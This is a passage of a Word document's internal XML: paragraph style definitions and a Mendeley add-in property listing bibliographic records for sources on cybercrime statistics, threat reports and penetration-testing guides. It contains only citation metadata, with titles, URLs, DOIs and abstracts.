    <w:name w:val="376174F0CE34467184B8C93A085DA6C2"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BC6DCBA513504282B3F22CD21D47555A">
    <w:name w:val="BC6DCBA513504282B3F22CD21D47555A"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="440CFC509D3C4F7396E5BCE394BFF6B3">
    <w:name w:val="440CFC509D3C4F7396E5BCE394BFF6B3"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E7073F58C37142BE903F1A32B9C3729D">
    <w:name w:val="E7073F58C37142BE903F1A32B9C3729D"/>
    <w:rsid w:val="00DD4250"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E3291508DE1B41CAB244A3ED086BA406">
    <w:name w:val="E3291508DE1B41CAB244A3ED086BA406"/>
    <w:rsid w:val="004D5B1E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="A9B58977D1134150A614816097915041">
    <w:name w:val="A9B58977D1134150A614816097915041"/>
    <w:rsid w:val="004D5B1E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="C8BD3C6292344480AF5624A7AB3B9BA8">
    <w:name w:val="C8BD3C6292344480AF5624A7AB3B9BA8"/>
    <w:rsid w:val="00C777FA"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EE9E71820EAE45E28E54A8F305D9DFB2">
    <w:name w:val="EE9E71820EAE45E28E54A8F305D9DFB2"/>
    <w:rsid w:val="00E745C3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EB1C2BD315FF4885B8C649B85ED2D99C">
    <w:name w:val="EB1C2BD315FF4885B8C649B85ED2D99C"/>
    <w:rsid w:val="00E745C3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="97CD04066F284B47A90DDEC2A1214392">
    <w:name w:val="97CD04066F284B47A90DDEC2A1214392"/>
    <w:rsid w:val="00E745C3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BB82B5154FB9478D82ADD82242CB557A">
    <w:name w:val="BB82B5154FB9478D82ADD82242CB557A"/>
    <w:rsid w:val="00E745C3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="C7CCC0CA0C634A548B7119F24AE0A316">
    <w:name w:val="C7CCC0CA0C634A548B7119F24AE0A316"/>
    <w:rsid w:val="00E745C3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="44017D732F274E7198B74F889CE9F3D2">
    <w:name w:val="44017D732F274E7198B74F889CE9F3D2"/>
    <w:rsid w:val="00E745C3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="F38738C3CECF47C1A859750AFEEDCBB3">
    <w:name w:val="F38738C3CECF47C1A859750AFEEDCBB3"/>
    <w:rsid w:val="00E745C3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="44C8873D8E2A43F6B16FAAC6FC588515">
    <w:name w:val="44C8873D8E2A43F6B16FAAC6FC588515"/>
    <w:rsid w:val="0079661A"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="A159E37B19E84BE9948676D77F6C508A">
    <w:name w:val="A159E37B19E84BE9948676D77F6C508A"/>
    <w:rsid w:val="00F50B34"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E1A9EBE287E4470DA73B937AA658F493">
    <w:name w:val="E1A9EBE287E4470DA73B937AA658F493"/>
    <w:rsid w:val="00F50B34"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="72356B4F99034C47AD1622056369442A">
    <w:name w:val="72356B4F99034C47AD1622056369442A"/>
    <w:rsid w:val="00F50B34"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3D08CA0525554A9C8A227A9EFD2EBC46">
    <w:name w:val="3D08CA0525554A9C8A227A9EFD2EBC46"/>
    <w:rsid w:val="00F50B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59D5672-01A8-4ED2-9026-A8C83FDC7453}">
  <we:reference id="wa104382081" version="1.46.0.0" store="en-GB" storeType="OMEX"/>
  <we:alternateReferences>
    <we:reference id="wa104382081" version="1.46.0.0" store="" storeType="OMEX"/>
  </we:alternateReferences>
  <we:properties>
    <we:property name="MENDELEY_CITATIONS" value="[{&quot;citationID&quot;:&quot;MENDELEY_CITATION_d2889322-2a73-4deb-81cb-44b608f06842&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[1]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;a5d5ffc2-503e-3d8c-8a8e-4eea0f7409b4&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;a5d5ffc2-503e-3d8c-8a8e-4eea0f7409b4&quot;,&quot;title&quot;:&quot;300+ Terrifying Cybercrime &amp; Cybersecurity Statistics (2022)&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,22]]},&quot;URL&quot;:&quot;https://www.comparitech.com/vpn/cybersecurity-cyber-crime-statistics-facts-trends/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_c189ebc1-4b9f-4d51-bbd6-89538175213e&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[1]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;a5d5ffc2-503e-3d8c-8a8e-4eea0f7409b4&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;a5d5ffc2-503e-3d8c-8a8e-4eea0f7409b4&quot;,&quot;title&quot;:&quot;300+ Terrifying Cybercrime &amp; Cybersecurity Statistics (2022)&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,22]]},&quot;URL&quot;:&quot;https://www.comparitech.com/vpn/cybersecurity-cyber-crime-statistics-facts-trends/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_ef3d2645-4500-4741-ac18-53c31ff58200&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[2]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;36366065-a27b-3a6c-a1d7-e2fa49a007de&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;36366065-a27b-3a6c-a1d7-e2fa49a007de&quot;,&quot;title&quot;:&quot;Conceptualizing Cybercrime: Definitions, Typologies and Taxonomies&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Phillips&quot;,&quot;given&quot;:&quot;Kirsty&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Davidson&quot;,&quot;given&quot;:&quot;Julia C.&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Farr&quot;,&quot;given&quot;:&quot;Ruby R.&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Burkhardt&quot;,&quot;given&quot;:&quot;Christine&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Caneppele&quot;,&quot;given&quot;:&quot;Stefano&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Aiken&quot;,&quot;given&quot;:&quot;Mary P.&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;container-title&quot;:&quot;Forensic Sciences&quot;,&quot;DOI&quot;:&quot;10.3390/forensicsci2020028&quot;,&quot;ISSN&quot;:&quot;2673-6756&quot;,&quot;URL&quot;:&quot;https://www.mdpi.com/2673-6756/2/2/28&quot;,&quot;issued&quot;:{&quot;date-parts&quot;:[[2022,4,16]]},&quot;page&quot;:&quot;379-398&quot;,&quot;abstract&quot;:&quot;&lt;p&gt;Cybercrime is becoming ever more pervasive and yet the lack of consensus surrounding what constitutes a cybercrime has a significant impact on society, legal and policy response, and academic research. Difficulties in understanding cybercrime begin with the variability in terminology and lack of consistency in cybercrime legislation across jurisdictions. In this review, using a structured literature review methodology, key cybercrime definitions, typologies and taxonomies were identified across a range of academic and non-academic (grey literature) sources. The findings of this review were consolidated and presented in the form of a new classification framework to understand cybercrime and cyberdeviance. Existing definitions, typologies and taxonomies were evaluated, and key challenges were identified. Whilst conceptualizing cybercrime will likely remain a challenge, this review provides recommendations for future work to advance towards a universal understanding of cybercrime phenomena as well as a robust and comprehensive classification system.&lt;/p&gt;&quot;,&quot;issue&quot;:&quot;2&quot;,&quot;volume&quot;:&quot;2&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_f76de3c0-1ad7-4be6-96fe-cf50a58d83e6&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[3]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;216a90a2-d4ff-3e13-9c2d-1f9eeb1a58a9&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;216a90a2-d4ff-3e13-9c2d-1f9eeb1a58a9&quot;,&quot;title&quot;:&quot;Cybercrime - prosecution guidance | The Crown Prosecution Service&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,23]]},&quot;URL&quot;:&quot;https://www.cps.gov.uk/legal-guidance/cybercrime-prosecution-guidance&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_7c6100ee-91cc-4ab0-b68b-c2639ed7e35f&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[4]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;f1e88059-8861-34e4-90cf-7bf79b0e4950&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;f1e88059-8861-34e4-90cf-7bf79b0e4950&quot;,&quot;title&quot;:&quot;2022 Cyber Attack Statistics, Data, and Trends | Parachute&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,23]]},&quot;URL&quot;:&quot;https://parachute.cloud/2022-cyber-attack-statistics-data-and-trends/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_6d86b5b1-59ce-49c2-8bd8-586ca6a5cc71&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[5]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;425232bd-36f6-3f47-abbc-a621793cc0a2&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;425232bd-36f6-3f47-abbc-a621793cc0a2&quot;,&quot;title&quot;:&quot;The rise of cyber crime - IT Governance UK Blog&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,22]]},&quot;URL&quot;:&quot;https://www.itgovernance.co.uk/blog/the-rise-of-cyber-crime&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_e1c828ea-1b3c-408b-a987-d3346f799ffb&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[1], [6]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;206cff45-07b7-379e-bf7a-1a5992a41021&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;206cff45-07b7-379e-bf7a-1a5992a41021&quot;,&quot;title&quot;:&quot;Cyberattacks at the Grass Roots: American Local Governments and the Need for High Levels of Cybersecurity&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Norris&quot;,&quot;given&quot;:&quot;Donald F.&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Mateczun&quot;,&quot;given&quot;:&quot;Laura&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Joshi&quot;,&quot;given&quot;:&quot;Anupam&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;},{&quot;family&quot;:&quot;Finin&quot;,&quot;given&quot;:&quot;Tim&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;container-title&quot;:&quot;Public Administration Review&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,22]]},&quot;DOI&quot;:&quot;10.1111/PUAR.13028&quot;,&quot;ISSN&quot;:&quot;15406210&quot;,&quot;issued&quot;:{&quot;date-parts&quot;:[[2019,11,1]]},&quot;page&quot;:&quot;895-904&quot;,&quot;abstract&quot;:&quot;This article examines data from the first-ever nationwide survey of cybersecurity among American local governments. The data show that these governments are under constant or near-constant cyberattack, yet, on average, they practice cybersecurity poorly. While nearly half reported experiencing cyberattacks at least daily, one-third said that they did not know whether they were under attack, and nearly two-thirds said that they did not know whether their information systems had been breached. Serious barriers to their practice of cybersecurity include a lack of cybersecurity preparedness within these governments and a lack of adequate funding for it. The authors make recommendations to local governments to improve their cybersecurity practice and to scholars for additional research into local government cybersecurity, an area that, to date, has largely been neglected by researchers from the social sciences and computer science.&quot;,&quot;publisher&quot;:&quot;Blackwell Publishing Ltd&quot;,&quot;issue&quot;:&quot;6&quot;,&quot;volume&quot;:&quot;79&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;a5d5ffc2-503e-3d8c-8a8e-4eea0f7409b4&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;a5d5ffc2-503e-3d8c-8a8e-4eea0f7409b4&quot;,&quot;title&quot;:&quot;300+ Terrifying Cybercrime &amp; Cybersecurity Statistics (2022)&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,22]]},&quot;URL&quot;:&quot;https://www.comparitech.com/vpn/cybersecurity-cyber-crime-statistics-facts-trends/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_1a382857-a90a-4a04-8583-10669117005c&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[7]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;9a5e9941-dd6d-3b8e-a448-1f880a2b8296&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;9a5e9941-dd6d-3b8e-a448-1f880a2b8296&quot;,&quot;title&quot;:&quot;IT threat evolution in Q2 2021. Mobile statistics | Securelist&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,22]]},&quot;URL&quot;:&quot;https://securelist.com/it-threat-evolution-q2-2021-mobile-statistics/103636/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_ee6af4e5-6945-4ec3-a9e3-5e7248cbea67&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[8]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;673cf429-b5a2-3832-90ed-0a4fa7783ffd&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;673cf429-b5a2-3832-90ed-0a4fa7783ffd&quot;,&quot;title&quot;:&quot;Cisco Annual CyberSecurity Report&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_df9a1816-6960-403c-8581-2d81901c13e9&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[1], [9]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;a5d5ffc2-503e-3d8c-8a8e-4eea0f7409b4&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;a5d5ffc2-503e-3d8c-8a8e-4eea0f7409b4&quot;,&quot;title&quot;:&quot;300+ Terrifying Cybercrime &amp; Cybersecurity Statistics (2022)&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,22]]},&quot;URL&quot;:&quot;https://www.comparitech.com/vpn/cybersecurity-cyber-crime-statistics-facts-trends/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;8477c7cd-fc5f-3d2d-954f-9a2588272fa4&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;8477c7cd-fc5f-3d2d-954f-9a2588272fa4&quot;,&quot;title&quot;:&quot;ENISA Threat Landscape 2020 - Malware — ENISA&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,22]]},&quot;URL&quot;:&quot;https://www.enisa.europa.eu/publications/malware&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_47d3fdb6-4009-456b-aaf0-c4d5134cb6f8&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[10]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;1e025400-528d-31f6-9a08-0d6c38c54192&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;1e025400-528d-31f6-9a08-0d6c38c54192&quot;,&quot;title&quot;:&quot;Malware Statistics &amp; Trends Report | AV-TEST&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,22]]},&quot;URL&quot;:&quot;https://www.av-test.org/en/statistics/malware/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_e8af7d8d-e9df-4912-ac27-a02c2f03e5a7&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[11]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;ed5b3cc8-4983-3c96-a411-59d6f5e5446f&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;ed5b3cc8-4983-3c96-a411-59d6f5e5446f&quot;,&quot;title&quot;:&quot;2020 Webroot Threat Report_US_FINAL&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_31bc7c76-2dbf-4a01-855e-084864e31e91&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[11]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;ed5b3cc8-4983-3c96-a411-59d6f5e5446f&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;ed5b3cc8-4983-3c96-a411-59d6f5e5446f&quot;,&quot;title&quot;:&quot;2020 Webroot Threat Report_US_FINAL&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_9c1b0b86-c7ea-4c23-bcbd-6318d2834f66&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[1]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;a5d5ffc2-503e-3d8c-8a8e-4eea0f7409b4&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;a5d5ffc2-503e-3d8c-8a8e-4eea0f7409b4&quot;,&quot;title&quot;:&quot;300+ Terrifying Cybercrime &amp; Cybersecurity Statistics (2022)&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,22]]},&quot;URL&quot;:&quot;https://www.comparitech.com/vpn/cybersecurity-cyber-crime-statistics-facts-trends/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_e3c6e33a-7c0f-42e6-8beb-b8afc99087c6&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[12]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;a2a351bb-9c2f-3f22-863e-675d6bfb13ae&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;a2a351bb-9c2f-3f22-863e-675d6bfb13ae&quot;,&quot;title&quot;:&quot;Is cybersecurity about more than protection?&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,22]]},&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_39ae0ef2-5f86-4469-b6a5-4ebc7625d13e&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[12]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;a2a351bb-9c2f-3f22-863e-675d6bfb13ae&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;article-journal&quot;,&quot;id&quot;:&quot;a2a351bb-9c2f-3f22-863e-675d6bfb13ae&quot;,&quot;title&quot;:&quot;Is cybersecurity about more than protection?&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,22]]},&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_c6e381fd-1215-4086-8fbc-e8bb6e1a785c&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[13]–[15]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;23212f41-1261-3f5c-a34b-f55b86cdea1f&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;23212f41-1261-3f5c-a34b-f55b86cdea1f&quot;,&quot;title&quot;:&quot;ETHICAL HACKING AND PENETRATION TESTING GUIDE&quot;,&quot;author&quot;:[{&quot;family&quot;:&quot;Baloch&quot;,&quot;given&quot;:&quot;Rafay&quot;,&quot;parse-names&quot;:false,&quot;dropping-particle&quot;:&quot;&quot;,&quot;non-dropping-particle&quot;:&quot;&quot;}],&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;76bf7eee-b0ea-352f-b116-1e0888970729&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;76bf7eee-b0ea-352f-b116-1e0888970729&quot;,&quot;title&quot;:&quot;OWASP Penetration Testing: The Essential Guide - Codepedia&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,21]]},&quot;URL&quot;:&quot;https://codepedia.info/owasp-penetration-testing&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false},{&quot;id&quot;:&quot;95aecbf8-f06e-36b8-b53f-dae2469dcd9b&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;95aecbf8-f06e-36b8-b53f-dae2469dcd9b&quot;,&quot;title&quot;:&quot;Pre-engagement - The Penetration Testing Execution Standard&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,21]]},&quot;URL&quot;:&quot;http://www.pentest-standard.org/index.php/Pre-engagement&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_eaf4de3f-5517-40d0-b187-14a8bd71e2b2&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[13], [16]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;23212f41-1261-3f5c-a34b-f55b86cdea1f&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;book&quot;,&quot;id&quot;:&quot;23212f41-1261-3f5c-a34b-f55b86cdea1f&quot;,&quot;title&quot;:&quot;ETHICAL HACKING AND PENETRATION TESTING 